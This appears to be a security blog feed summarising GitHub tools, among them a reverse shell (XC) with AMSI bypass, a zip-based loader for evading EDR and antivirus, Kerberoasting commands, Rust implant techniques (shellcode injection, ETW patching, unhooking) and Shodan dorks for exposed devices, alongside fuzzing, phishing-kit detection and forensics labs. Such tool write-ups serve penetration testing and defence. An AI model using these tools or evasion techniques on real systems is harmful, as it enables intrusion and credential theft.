    • The output object files will be inside ${workspace}/${module}/objs/afl.
    • If you create an empty file named TRACE_MODE inside the workspace, then the output object files will be inside ${workspace}/${module}/objs/trace.
    • By the way, it will also generate 3 files inside ${workspace}/${module} :
      • exports_afl.def (used for linking)
      • exports_trace.def (used for linking)
      • hint.txt (used for patching)
  7. Generate lib files by running the script utils/LibImports.py.

    • The output lib files will be inside ${workspace}/${module}/libs, used for linking later.
  8. Open a terminal and change the directory to the workspace.

  9. Link all the object files and lib files by using utils/link.bat.

    • e.g. utils/link.bat GdiPlus dll afl /RELEASE
    • It will generate the new binary with the pdb file inside ${workspace}/${module}.
  10. Patch the new built binary by using utils/PatchPEHeader.py.

    • e.g. utils/PatchPEHeader.py GdiPlus/GdiPlus.afl.dll
    • For the first time, you may need to run utils/register_msdia_run_as_administrator.bat as administrator.
  11. Run & Fuzz.

More details

HITB Slides : https://github.com/jhftss/jhftss.github.io/blob/main/res/slides/HITB2021SIN%20-%20IDA2Obj%20-%20Mickey%20Jin.pdf

Demo : https://drive.google.com/file/d/1N3DXJCts5jG0Y5B92CrJOTIHedWyEQKr/view?usp=sharing



ClusterFuzzLite - Simple Continuous Fuzzing That Runs In CI

3 December 2021 at 11:30
By: Zion3R


ClusterFuzzLite is a continuous fuzzing solution that runs as part of Continuous Integration (CI) workflows to find vulnerabilities faster than ever before. With just a few lines of code, GitHub users can integrate ClusterFuzzLite into their workflow and fuzz pull requests to catch bugs before they are committed.

ClusterFuzzLite is based on ClusterFuzz.


Features

  • Quick code change (pull request) fuzzing to find bugs before they land
  • Downloads of crashing testcases
  • Continuous longer running fuzzing (batch fuzzing) to asynchronously find deeper bugs missed during code change fuzzing and build a corpus for use in code change fuzzing
  • Coverage reports showing which parts of your code are fuzzed
  • Modular functionality, so you can decide which features you want to use


Supported Languages

  • C
  • C++
  • Java (and other JVM-based languages)
  • Go
  • Python
  • Rust
  • Swift

Supported CI Systems

  • GitHub Actions
  • Google Cloud Build
  • Prow
  • Support for more CI systems is in progress, and extending support to other CI systems is easy

Documentation

Read our detailed documentation to learn how to use ClusterFuzzLite.

Staying in touch

Join our mailing list for announcements and discussions.

If you use ClusterFuzzLite, please fill out this form so we know who is using it. This gives us an idea of the impact of ClusterFuzzLite and allows us to justify future work.

Feel free to file an issue if you experience any trouble or have feature requests.



Crawpy - Yet Another Content Discovery Tool

2 December 2021 at 20:30
By: Zion3R


Yet another content discovery tool written in python.

What makes this tool different than others:

  • It is written to work asynchronously, which allows it to reach the configured concurrency limits, so it is very fast
  • Calibration mode that applies filters on its own
  • A bunch of flags that help you fuzz in detail
  • Recursive scan mode for given status codes, with configurable depth
  • Report generation, so you can review your results later
  • Multiple URL scans
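The asynchronous design can be illustrated with a minimal stdlib sketch (an assumed pattern, not crawpy's actual code): a semaphore caps concurrency while every wordlist entry is probed at once.

```python
import asyncio

# Minimal sketch of the async pattern described above; the real tool issues
# HTTP requests where this stub only builds candidate URLs.
async def probe(sem, base, word, results):
    async with sem:
        await asyncio.sleep(0)  # placeholder for the HTTP request
        results.append(f"{base}/{word}")

async def run(base, wordlist, threads=20):
    sem = asyncio.Semaphore(threads)  # mirrors crawpy's -t flag
    results = []
    await asyncio.gather(*(probe(sem, base, w, results) for w in wordlist))
    return results

urls = asyncio.run(run("https://example.com", ["admin", "backup", "js"]))
```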

An example run

Yet another content discovery tool (1)

An example run with auto calibration and recursive mode enabled

Yet another content discovery tool (2)

Example reports

Example reports can be found here

https://morph3sec.com/crawpy/example.html
https://morph3sec.com/crawpy/example.txt

Installation

git clone https://github.com/morph3/crawpy
pip3 install -r requirements.txt
or
python3 -m pip install -r requirements.txt

Usage

morph3 ➜ crawpy/ [mainβœ—] Ξ» python3 crawpy.py --help
usage: crawpy.py [-h] [-u URL] [-w WORDLIST] [-t THREADS] [-rc RECURSIVE_CODES] [-rp RECURSIVE_PATHS] [-rd RECURSIVE_DEPTH] [-e EXTENSIONS] [-to TIMEOUT] [-follow] [-ac] [-fc FILTER_CODE] [-fs FILTER_SIZE] [-fw FILTER_WORD] [-fl FILTER_LINE] [-k] [-m MAX_RETRY]
[-H HEADERS] [-o OUTPUT_FILE] [-gr] [-l URL_LIST] [-lt LIST_THREADS] [-s] [-X HTTP_METHOD] [-p PROXY_SERVER]

optional arguments:
-h, --help show this help message and exit
-u URL, --url URL URL
-w WORDLIST, --wordlist WORDLIST
Wordlist
-t THREADS, --threads THREADS
Size of the semaphore pool
-rc RECURSIVE_CODES, --recursive-codes RECURSIVE_CODES
Recursive codes to scan recursively Example: 301,302,307
-rp RECURSIVE_PATHS, --recursive-paths RECURSIVE_PATHS
Recursive paths to scan recursively, please note that only given recursive paths will be scanned initially Example: admin,support,js,backup
-rd RECURSIVE_DEPTH, --recursive-depth RECURSIVE_DEPTH
Recursive scan depth Example: 2
-e EXTENSIONS, --extension EXTENSIONS
Add extensions at the end. Separate them with commas. Example: -e .php,.html,.txt
-to TIMEOUT, --timeout TIMEOUT
Timeout. Using this option is not recommended, as it currently produces many errors that have not been resolved yet
-follow, --follow-redirects
Follow redirects
-ac, --auto-calibrate
Automatically calibrate filters
-fc FILTER_CODE, --filter-code FILTER_CODE
Filter status code
-fs FILTER_SIZE, --filter-size FILTER_SIZE
Filter size
-fw FILTER_WORD, --filter-word FILTER_WORD
Filter words
-fl FILTER_LINE, --filter-line FILTER_LINE
Filter line
-k, --ignore-ssl Ignore untrusted SSL certificate
-m MAX_RETRY, --max-retry MAX_RETRY
Max retry
-H HEADERS, --headers HEADERS
Headers, you can set the flag multiple times.For example: -H "X-Forwarded-For: 127.0.0.1", -H "Host: foobar"
-o OUTPUT_FILE, --output OUTPUT_FILE
Output folder
-gr, --generate-report
If you want crawpy to generate a report, default path is crawpy/reports/<url>.txt
-l URL_LIST, --list URL_LIST
Takes a list of urls as input and runs crawpy on them via multiprocessing: -l ./urls.txt
-lt LIST_THREADS, --list-threads LIST_THREADS
Number of threads for running crawpy in parallel when running with a list of urls
-s, --silent Make crawpy not produce output
-X HTTP_METHOD, --http-method HTTP_METHOD
HTTP request method
-p PROXY_SERVER, --proxy PROXY_SERVER
Proxy server, ex: 'http://127.0.0.1:8080'

Examples

python3 crawpy.py -u https://facebook.com/FUZZ -w ./common.txt  -k -ac  -e .php,.html
python3 crawpy.py -u https://google.com/FUZZ -w ./common.txt -k -fw 9,83 -rc 301,302 -rd 2
python3 crawpy.py -u https://morph3sec.com/FUZZ -w ./common.txt -e .php,.html -t 20 -ac -k
python3 crawpy.py -u https://google.com/FUZZ -w ./common.txt -ac -gr
python3 crawpy.py -u https://google.com/FUZZ -w ./common.txt -ac -gr -o /tmp/test.txt
sudo python3 crawpy.py -l urls.txt -lt 20 -gr -w ./common.txt -t 20 -o custom_reports -k -ac -s
python3 crawpy.py -u https://google.com/FUZZ -w ./common.txt -ac -gr -rd 1 -rc 302,301 -rp admin,backup,support -k


Kerberoast - Kerberoast Attack -Pure Python-

2 December 2021 at 11:30
By: Zion3R


Kerberos attack toolkit -pure python-Β 


Install

pip3 install kerberoast

Prerequisites

Python 3.6. See requirements.txt

For the impatient

IMPORTANT: the accepted target url formats for LDAP and Kerberos are the following
<ldap_connection_url> : <protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>
<kerberos_connection_url>: <protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>
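A hypothetical sketch of how such a connection URL breaks down (for illustration only; the real tool relies on its own URL parsers):

```python
import re

# Hypothetical parser for the documented URL shape
# <protocol>+<auth-type>://<domain>\<user>:<password>@<host>/?<params>
URL_RE = re.compile(
    r"^(?P<protocol>[^+]+)\+(?P<authtype>[^:]+)://"
    r"(?P<domain>[^\\]+)\\(?P<user>[^:]+):(?P<password>[^@]+)@"
    r"(?P<host>[^/]+)(?:/\?(?P<params>.*))?$"
)

def parse_url(url):
    match = URL_RE.match(url)
    if match is None:
        raise ValueError("unrecognized connection url")
    return match.groupdict()

# example values are made up
info = parse_url(r"kerberos+password://CORP\alice:Passw0rd@10.0.0.1/?timeout=5")
```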

Steps -with SSPI-: kerberoast auto <DC_ip>

Steps -SSPI not used-:

  1. Look for vulnerable users via LDAP
    kerberoast ldap all <ldap_connection_url> -o ldapenum
  2. Use ASREP roast against users in the ldapenum_asrep_users.txt file
    kerberoast asreproast <DC_ip> -t ldapenum_asrep_users.txt
  3. Use SPN roast against users in the ldapenum_spn_users.txt file
    kerberoast spnroast <kerberos_connection_url> -t ldapenum_spn_users.txt
  4. Crack SPN roast and ASPREP roast output with hashcat

Commands

ldap

This command group is for enumerating potentially vulnerable users via LDAP.

Command structure

Β Β Β Β kerberoast ldap <type> <ldap_connection_url> <options>

Type: It supports three types of users to be enumerated

  1. spn Enumerates users with servicePrincipalName attribute set.
  2. asrep Enumerates users with DONT_REQ_PREAUTH flag set in their UAC attribute.
  3. all Starts all of the above enumerations.

ldap_connection_url: Specifies the user credential and the target server in the msldap URL format (see help)

options:
Β Β Β Β -o: Output file base name

brute

This command performs username enumeration by brute-forcing the Kerberos service with a list of possible username candidates

Command structure

Β Β Β Β kerberoast brute <realm> <dc_ip> <targets> <options>

realm: The kerberos realm usually looks like COMPANY.corp
dc_ip: IP or hostname of the domain controller
targets: Path to the file which contains the possible username candidates
options:
Β Β Β Β -o: Output file base name

asreproast

This command performs the ASREProast attack

Command structure

Β Β Β Β kerberoast asreproast <dc_ip> <options>

dc_ip: IP or hostname of the domain controller
options:
Β Β Β Β -r: Specifies the kerberos realm to be used. It overrides all other realm info.
Β Β Β Β -o: Output file base name
Β Β Β Β -t: Path to the file which contains the usernames to perform the attack on
Β Β Β Β -u: Specifies the user to perform the attack on. Format is either <username> or <username>@<realm> but in the first case, the -r option must be used to specify the realm

spnroast

This command performs the SPNroast (AKA kerberoast) attack.

Command structure

Β Β Β Β kerberoast spnroast <kerberos_connection_url> <options>

kerberos_connection_url: Specifies the user credential and the target server in the kerberos URL format (see help)

options:
Β Β Β Β -r: Specifies the kerberos realm to be used. It overrides all other realm info.
Β Β Β Β -o: Output file base name
Β Β Β Β -t: Path to the file which contains the usernames to perform the attack on
Β Β Β Β -u: Specifies the user to perform the attack on. Format is either <username> or <username>@<realm> but in the first case, the -r option must be used to specify the realm



ShonyDanza - A Customizable, Easy-To-Navigate Tool For Researching, Pen Testing, And Defending With The Power Of Shodan

1 December 2021 at 20:30
By: Zion3R


A customizable, easy-to-navigate tool for researching, pen testing, and defending with the power of Shodan.


With ShonyDanza, you can:

  • Obtain IPs based on search criteria
  • Automatically exclude honeypots from the results based on your pre-configured thresholds
  • Pre-configure all IP searches to filter on your specified net range(s)
  • Pre-configure search limits
  • Use build-a-search to craft searches with easy building blocks
  • Use stock searches and pre-configure your own stock searches
  • Check if IPs are known malware C2s
  • Get host and domain profiles
  • Scan on-demand
  • Find exploits
  • Get total counts for searches and exploits
  • Automatically save exploit code, IP lists, host profiles, domain profiles, and scan results to directories within ShonyDanza
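The honeypot-exclusion idea reduces to a simple threshold filter. A hypothetical sketch (ShonyDanza obtains honeyscores through the shodan library; the data shape below is assumed):

```python
# Hypothetical sketch: drop hosts whose Shodan honeyscore exceeds the
# configured limit; a limit of 1.0 keeps everything.
HONEYSCORE_LIMIT = 0.5

def filter_honeypots(hosts, limit=HONEYSCORE_LIMIT):
    # each host is assumed to be a dict like {"ip": ..., "honeyscore": 0.0-1.0}
    return [h for h in hosts if h["honeyscore"] <= limit]

hosts = [
    {"ip": "1.2.3.4", "honeyscore": 0.1},
    {"ip": "5.6.7.8", "honeyscore": 0.9},  # likely honeypot, filtered out
]
kept = filter_honeypots(hosts)
```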

Installation

git clone https://github.com/fierceoj/ShonyDanza.git

Requirements

  • python3
  • shodan library

cd ShonyDanza
pip3 install -r requirements.txt

Usage

Edit config.py to include your desired configurations
cd configs
sudo nano config.py

#config file for shonydanza searches

#REQUIRED
#maximum number of results that will be returned per search
#default is 100

SEARCH_LIMIT = 100


#REQUIRED
#IPs exceeding the honeyscore limit will not show up in IP results
#scale is 0.0 to 1.0
#adjust to desired probability to restrict results by threshold, or keep at 1.0 to include all results

HONEYSCORE_LIMIT = 1.0


#REQUIRED - at least one key: value pair
#add a shodan dork to the dictionary below to add it to your shonydanza stock searches menu
#see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries
#check into "vuln:" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510)

STOCK_SEARCHES = {
'ANONYMOUS_FTP':'ftp anonymous ok',
'RDP':'port:3389 has_screenshot:true',
'OPEN_TELNET':'port:23 console gateway -password',
'APACHE_DIR_LIST':'http.title:"Index of / "',
'SPRING_BOOT':'http.favicon.hash:116323821',
'HP_PRINTERS':'"Serial Number:" "Built:" "Server: HP HTTP"',
'DOCKER_API':'"Docker Containers:" port:2375',
'ANDROID_ROOT_BRIDGE':'"Android Debug Bridge" "Device" port:5555',
'MONGO_EXPRESS_GUI':'"Set-Cookie: mongo-express=" "200 OK"',
'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/',
'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:"Citrix NetScaler"',
'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 "3992"',
'CVE-2020-3452_CISCO_ASA_FTD':'200 "Set-Cookie: webvpn;"'
}


#OPTIONAL
#IP or cidr range constraint for searches that return list of IP addresses
#use comma-separated list to designate multiple (e.g. 1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4)

#NET_RANGE = '0.0.0.0/0'
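The NET_RANGE constraint boils down to a membership test over the configured IPs and CIDR ranges. A hypothetical stdlib sketch of that check:

```python
import ipaddress

# Hypothetical sketch of the NET_RANGE filter: keep an IP only if it falls
# inside one of the comma-separated IPs/CIDR ranges.
NET_RANGE = "1.1.1.1,2.2.0.0/16"

def in_net_range(ip, net_range=NET_RANGE):
    nets = [ipaddress.ip_network(n, strict=False) for n in net_range.split(",")]
    return any(ipaddress.ip_address(ip) in net for net in nets)
```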

Run
cd ../
python3 shonydanza.py

See this how-to article for additional usage instruction.

Legal Disclaimer

This project is made for educational and ethical testing purposes only. Usage of ShonyDanza for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.



XC - A Small Reverse Shell For Linux And Windows

1 December 2021 at 11:30
By: Zion3R


Netcat like reverse shell for Linux & Windows.


Features

Windows

Usage:
β”” Shared Commands: !exit
!upload <src> <dst>
* uploads a file to the target
!download <src> <dst>
* downloads a file from the target
!lfwd <localport> <remoteaddr> <remoteport>
* local portforwarding (like ssh -L)
!rfwd <remoteport> <localaddr> <localport>
* remote portforwarding (like ssh -R)
!lsfwd
* lists active forwards
!rmfwd <index>
* removes forward by index
!plugins
* lists available plugins
!plugin <plugin>
* execute a plugin
!spawn <port>
* spawns another client on the specified port
!shell
* runs /bin/sh
!runas <username> <password> <domain>
* restart xc with the specified user
!met <port>
* connects to a x64/meterpreter/reverse_tcp listener
β”” OS Specific Commands:
!powershell
* starts powershell with AMSI Bypass
!rc <port>
* connects to a local bind shell and restarts this client over it
!runasps <username> <password> <domain>
* restart xc with the specified user using powershell
!vulns
* checks for common vulnerabilities

Linux

Usage:
β”” Shared Commands: !exit
!upload <src> <dst>
* uploads a file to the target
!download <src> <dst>
* downloads a file from the target
!lfwd <localport> <remoteaddr> <remoteport>
* local portforwarding (like ssh -L)
!rfwd <remoteport> <localaddr> <localport>
* remote portforwarding (like ssh -R)
!lsfwd
* lists active forwards
!rmfwd <index>
* removes forward by index
!plugins
* lists available plugins
!plugin <plugin>
* execute a plugin
!spawn <port>
* spawns another client on the specified port
!shell
* runs /bin/sh
!runas <username> <password> <domain>
* restart xc with the specified user
!met <port>
* connects to a x64/meterpreter/reverse_tcp listener
β”” OS Specific Commands:
!ssh <port>
* starts sshd with the configured keys on the specified port

Examples

  • Linux Attacker: rlwrap xc -l -p 1337 (Server)
  • WindowsVictim : xc.exe 10.10.14.4 1337 (Client)
  • Argumentless: xc_10.10.14.4_1337.exe (Client)

Setup

Make sure you are running Go version 1.15+; older versions will not compile. Tested on Ubuntu (go version go1.16.2 linux/amd64) and Kali (go version go1.15.9 linux/amd64).

git clone --recurse-submodules https://github.com/xct/xc.git

GO111MODULE=off go get golang.org/x/sys/...
GO111MODULE=off go get golang.org/x/text/encoding/unicode
GO111MODULE=off go get github.com/hashicorp/yamux
sudo apt-get install rlwrap upx

Linux:

python3 build.py

Known Issues

  • When !lfwd fails due to lack of permissions (missing sudo), the entry in !lsfwd is still created
  • Can't Ctrl+C out of powershell started from !shell
  • !net (execute-assembly) fails after using it a few times - for now you can !restart and it might work again
  • Tested:
    • Kali (Attacker) Win 10 (Victim)

Credits



ZipExec - A Unique Technique To Execute Binaries From A Password Protected Zip

30 November 2021 at 20:30
By: Zion3R


ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. This zip file is then base64 encoded into a string that is rebuilt on disk. This encoded string is then loaded into a JScript file that when executed, would rebuild the password-protected zip file on disk and execute it. This is done programmatically by using COM objects to access the GUI-based functions in Windows via the generated JScript loader, executing the loader inside the password-protected zip without having to unzip it first. By password protecting the zip file, it protects the binary from EDRs and disk-based or anti-malware scanning mechanisms.
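The pack-and-encode stage can be illustrated in Python (a hypothetical sketch only: the stdlib zipfile module cannot write password-protected archives, which ZipExec's Go implementation handles via the yeka/zip library):

```python
import base64
import io
import zipfile

# Hypothetical sketch of the packaging step: put a payload into an
# in-memory (here unencrypted) zip and base64-encode it for embedding
# in a loader script.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("payload.exe", b"MZ...")  # stand-in bytes, not a real binary

encoded = base64.b64encode(buf.getvalue()).decode()

# A loader would reverse the process: decode the string and rebuild the
# zip on disk before executing it.
rebuilt = base64.b64decode(encoded)
```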


Installation

The first step, as always, is to clone the repo. Before you compile ZipExec, you'll need to install the dependencies. To install them, run the following commands:

go get github.com/yeka/zip

Then build it

go build ZipExec.go

or

go get github.com/Tylous/ZipExec

Help

./ZipExec -h

__________.__ ___________
\____ /|__|_____\_ _____/__ ___ ____ ____
/ / | \____ \| __)_\ \/ // __ \_/ ___\
/ /_ | | |_> > \> <\ ___/\ \___
/_______ \|__| __/_______ /__/\_ \\___ >\___ >
\/ |__| \/ \/ \/ \/
(@Tyl0us)

Usage of ./ZipExec:
-I string
Path to the file containing binary to zip.
-O string
Name of output file (e.g. loader.js)
-sandbox
Enables sandbox evasion using IsDomainedJoined.


Kit_Hunter - A Basic Phishing Kit Scanner For Dedicated And Semi-Dedicated Hosting

30 November 2021 at 11:30
By: Zion3R


Kit Hunter: A basic phishing kit detection tool

  • Version 2.6.0
  • 28 September 2021

Testing and development took place on Python 3.7.3 (Linux)


What is Kit Hunter?

Kit Hunter is a personal project to learn Python, and a basic scanning tool that will search directories and locate phishing kits based on established markers. As detection happens, a report is generated for administrators.

By default the script will generate a report that shows the files that were detected as potentially problematic, list the markers that indicated them as problematic (a.k.a. tags), and then show the exact line of code where the detection happened.
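The marker-based detection described above can be sketched in a few lines (hypothetical code, not Kit Hunter's actual implementation; the sample tags are illustrative):

```python
# Hypothetical sketch: flag any line that contains one of the tag-file
# markers, recording the line number, the matching tag, and the line itself.
def load_tags(text):
    # tag files hold one marker per line
    return [t.strip() for t in text.splitlines() if t.strip()]

def scan_lines(lines, tags):
    hits = []
    for lineno, line in enumerate(lines, 1):
        for tag in tags:
            if tag in line:
                hits.append((lineno, tag, line))
    return hits

tags = load_tags("eval(base64_decode\nionCube")
hits = scan_lines(["<?php", "eval(base64_decode($x));"], tags)
```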

Usage:

Detailed installation and usage instructions are available at SteveD3.io

Help

To get quick help: python3 kit_hunter_2.py -h

Default scan

To launch a full scan using the default settings: python3 kit_hunter_2.py

Quick scan

To launch a quick scan, using minimal detection rules: python3 kit_hunter_2.py -q

Custom scan

To launch a custom scan: python3 kit_hunter_2.py -c

Note: When using the -c switch, you must place a tag file in the same location as Kit Hunter. You can name this file whatever you want, but the extension must be .tag. Please remember that the formatting is important: only one item per line, and no whitespace. You can look at the other tag files if you need examples.

Directory selected scanning

You can run kit_hunter_2.py from any location using the -d switch to select a directory to scan:

python3 kit_hunter_2.py -d /path/to/directory

However, it is easier if you place kit_hunter_2.py in the directory above your web root (e.g. /www/ or /public_html/) and call the script from there.

The final report will be generated in the directory being scanned.

In my usage, I call Kit Hunter from my /kit/download/ directory where new phishing kits are saved. My reports are then generated and saved to that folder. However, if I call Kit Hunter and scan my /PHISHING/Archive/ folder using the -d switch, then the report will save to /PHISHING/Archive/.

Shell detection

This latest release of Kit Hunter comes with shell detection. Shell scripts are often packaged with phishing kits, or used to deploy phishing kits on webservers. Kit Hunter will scan for some common shell script elements. The process works exactly the same way as regular scanning, only the shell detections are called with the -s switch. This is a standalone scan, so you can't run it with other types. You can however leverage the -m and -l flags with shell scanning. See the script's help section for more details.

Once scanning is complete, output from the script will point you to the location of the saved scan report.

Tag Files:

When it comes to the tag files, there are 41 tag files shipping with v2.5.8 Kit Hunter. These tag files detect targeted phishing campaigns, as well as various types of phishing tricks, such as obfuscation, templating, theming, and even branded kits like Kr3pto and Ex-Robotos. New tag files will be added, and existing tag files will be updated on a semi-regular basis. See the changelog for details.

As was the case with v1.0, the longer the tag file is, the longer it will take for the script to read it.



Digital-Forensics-Lab - Free Hands-On Digital Forensics Labs For Students And Faculty

29 November 2021 at 20:30
By: Zion3R


Features of Repository

===================

  • Hands-on Digital Forensics Labs: designed for Students and Faculty
  • Linux-based lab: All labs are purely based on Kali Linux
  • Lab screenshots: Each lab has PPTs with instruction screenshots
  • Comprehensive: Cover many topics in digital forensics
  • Free: All tools are open source
  • Updated: The project is funded by DOJ and will keep updating
  • Two formalized forensic intelligence JSON files based on case studies

Table of Contents (updating)

# The following commands will install all tools needed for Data Leakage Case. We will upgrade the script to add more tools for other labs soon.

wget https://raw.githubusercontent.com/frankwxu/digital-forensics-lab/main/Help/tool-install-zsh.sh
chmod +x tool-install-zsh.sh
./tool-install-zsh.sh


Investigating P2P Data Leakage

==============

The P2P data leakage case study helps students apply various forensic techniques to investigate intellectual property theft involving P2P. The study includes

  • A large and complex case involving a uTorrent client. The case is similar to NIST data leakage lab. However, it provides a clearer and more detailed timeline.
  • Solid evidence with explanations. Each piece of evidence associated with each activity is explained along the timeline. We suggest using this before studying the NIST data leakage case study.
  • 10 hands-on labs/topics in digital forensics

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 Lab Environment Setting Up 4M
Lab 1 Disk Image and Partitions 5M
Lab 2 Windows Registry and File Directory 15M
Lab 3 MFT Timeline 6M
Lab 4 USN Journal Timeline 3M
Lab 5 uTorrent Log File 9M
Lab 6 File Signature 8M
Lab 7 Emails 9M
Lab 8 Web History 11M
Lab 9 Website Analysis 2M
Lab 10 Timeline (Summary) 13K

Investigating NIST Data Leakage

==============

The case study is to investigate an image involving intellectual property theft. The study includes

  • A large and complex case study created by NIST. You can access the scenario and DD/EnCase images. You can also find the solutions on their website.
  • 14 hands-on labs/topics in digital forensics

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 Environment Setting Up 2M
Lab 1 Windows Registry 3M
Lab 2 Windows Event and XML 3M
Lab 3 Web History and SQL 3M
Lab 4 Email Investigation 3M
Lab 5 File Change History and USN Journal 2M
Lab 6 Network Evidence and shellbag 2M
Lab 7 Network Drive and Cloud 5M
Lab 8 Master File Table ($MFT) and Log File ($logFile) Analysis 13M
Lab 9 Windows Search History 4M
Lab 10 Windows Volume Shadow Copy Analysis 6M
Lab 11 Recycle Bin and Anti-Forensics 3M
Lab 12 Data Carving 3M
Lab 13 Crack Windows Passwords 2M

Investigating Illegal Possession of Images

=====================

The case study is to investigate the illegal possession of Rhino images. This image was contributed by Dr. Golden G. Richard III, and was originally used in the DFRWS 2005 RODEO CHALLENGE. NIST hosts the USB DD image. A copy of the image is also available in the repository.

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 HTTP Analysis using Wireshark (text) 3M
Lab 1 HTTP Analysis using Wireshark (image) 6M
Lab 2 Rhino Possession Investigation 1: File recovering 9M
Lab 3 Rhino Possession Investigation 2: Steganography 4M
Lab 4 Rhino Possession Investigation 3: Extract Evidence from FTP Traffic 3M
Lab 5 Rhino Possession Investigation 4: Extract Evidence from HTTP Traffic 5M

Investigating Email Harassment

=========

The case study is to investigate the harassment email sent by a student to a faculty member. The case is hosted by digitalcorpora.org. You can access the scenario description and network traffic from their website. The repository only provides lab instructions.

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 Investigating Harassment Email using Wireshark 3M
Lab 1 t-shark Forensic Introduction 2M
Lab 2 Investigating Harassment Email using t-shark 2M

Investigating Illegal File Transferring (Memory Forensics )

=========

The case study is to investigate computer memory for reconstructing a timeline of illegal data transferring. The case includes a scenario of transferring sensitive files from a server to a USB drive.

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 Memory Forensics 11M
part 1 Understand the Suspect and Accounts
part 2 Understand the Suspect’s PC
part 3 Network Forensics
part 4 Investigate Command History
part 5 Investigate Suspect’s USB
part 6 Investigate Internet Explorer History
part 7 Investigate File Explorer History
part 8 Timeline Analysis

Investigating Hacking Case

=========

The case study, including a disk image provided by NIST, is to investigate a hacker who intercepts internet traffic within range of wireless access points.

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 Hacking Case 8M

Investigating Android 10

The image is created by Joshua Hickman and hosted by digitalcorpora.

=========

Labs Topics Covered Size of PPTs
Lab 0 Intro Pixel 3 3M
Lab 1 Pixel 3 Image 2M
Lab 2 Pixel 3 Device 4M
Lab 3 Pixel 3 System Setting 5M
Lab 4 Overview: App Life Cycle 11M
Lab 5.1.1 AOSP App Investigations: Messaging 4M
Lab 5.1.2 AOSP App Investigations: Contacts 3M
Lab 5.1.3 AOSP App Investigations: Calendar 1M
Lab 5.2.1 GMS App Investigations: Messaging 6M
Lab 5.2.2 GMS App Investigations: Dialer 2M
Lab 5.2.3 GMS App Investigations: Maps 8M
Lab 5.2.4 GMS App Investigations: Photos 6M
Lab 5.3.1 Third-Party App Investigations: Kik 4M
Lab 5.3.2 Third-Party App Investigations: textnow 1M
Lab 5.3.3 Third-Party App Investigations: whatapp 3M
Lab 6 Pixel 3 Rooting 5M

Tools Used

========

Name version vendor
Wine 6.0 https://source.winehq.org/git/wine.git/
Vinetto 0.98 https://github.com/AtesComp/Vinetto
imgclip 05.12.2017 https://github.com/Arthelon/imgclip
Tree 06.01.2020 https://github.com/kddeisz/tree
RegRipper 3.0 https://github.com/keydet89/RegRipper3.0
Windows-Prefetch-Parser 05.01.2016 https://github.com/PoorBillionaire/Windows-Prefetch-Parser.git
python-evtx 05.21.2020 https://github.com/williballenthin/python-evtx
xmlstarlet 1.6.1 https://github.com/fishjam/xmlstarlet
hivex 09.15.2020 https://github.com/libguestfs/hivex
libesedb 01.01.2021 https://github.com/libyal/libesedb
pasco-project 02.09.2017 https://annsli.github.io/pasco-project/
libpff 01.17.2021 https://github.com/libyal/libpff
USN-Record-Carver 05.21.2017 https://github.com/PoorBillionaire/USN-Record-Carver
USN-Journal-Parser 1212.2018 https://github.com/PoorBillionaire/USN-Journal-Parser
JLECmd 1.4.0.0 https://f001.backblazeb2.com/file/EricZimmermanTools/JLECmd.zip
libnl-utils 3.2.27 https://packages.ubuntu.com/xenial/libs/libnl-utils
time_decode 12.13.2020 https://github.com/digitalsleuth/time_decode
analyzeMFT 2.0.4 https://github.com/dkovar/analyzeMFT
libvshadow 12.20.2020 https://github.com/libyal/libvshadow
recentfilecache-parser 02.13.2018 https://github.com/prolsen/recentfilecache-parser

Contribution

=============

  • Frank Xu
  • Malcolm Hayward
  • Richard (Max) Wheeless

Free hands-on digital forensics labs for students and faculty (3)



OffensiveRust - Rust Weaponization For Red Team Engagements

29 November 2021 at 11:30
By: Zion3R


My experiments in weaponizing Rust for implant development and general offensive operations.


Why Rust?

  • It is faster than languages like C/C++
  • It is a multi-purpose language with excellent communities
  • It has an amazing built-in dependency and build manager called Cargo
  • It is LLVM based, which makes it a very good candidate for bypassing static AV detection
  • Super easy cross-compilation to Windows from *nix/macOS; it only requires installing the mingw toolchain, although certain libraries cannot be compiled successfully for other OSes

Examples in this repo

File Description
Allocate_With_Syscalls It uses NTDLL functions directly with the ntapi Library
Create_DLL Creates a DLL that pops up a msgbox; Rust does not fully support this, so things might get weird since Rust DLLs do not have a main function
DeviceIoControl Opens driver handle and executing DeviceIoControl
EnableDebugPrivileges Enable SeDebugPrivilege in the current process
Shellcode_Local_inject Executes shellcode directly in local process by casting pointer
Execute_With_CMD Executes cmd by passing a command via Rust
ImportedFunctionCall It imports minidump from dbghelp and executes it
Kernel_Driver_Exploit Kernel Driver exploit for a simple buffer overflow
Named_Pipe_Client Named Pipe Client
Named_Pipe_Server Named Pipe Server
Process_Injection_CreateThread Process Injection in remote process with CreateRemoteThread
Unhooking Unhooking calls
asm_syscall Obtaining PEB address via asm
base64_system_enum Base64 encoding/decoding strings
http-https-requests HTTP/S requests by ignoring cert check for GET/POST
patch_etw Patch ETW
ppid_spoof Spoof parent process for created process
tcp_ssl_client TCP client with SSL that ignores cert check (Requires openssl and perl to be installed for compiling)
tcp_ssl_server TCP Server, with port parameter(Requires openssl and perl to be installed for compiling)
wmi_execute Executes WMI query to obtain the AV/EDRs in the host
Windows.h+ Bindings This file contains structures of Windows.h plus complete customized LDR,PEB,etc.. that are undocumented officially by Microsoft, add at the top of your file include!("../bindings.rs");
UUID_Shellcode_Execution Plants shellcode from UUID array into heap space and uses EnumSystemLocalesA Callback in order to execute the shellcode.

Compiling the examples in this repo

This repository does not provide binaries; you will have to compile them yourself.

Install Rust
Simply download the binary and install.

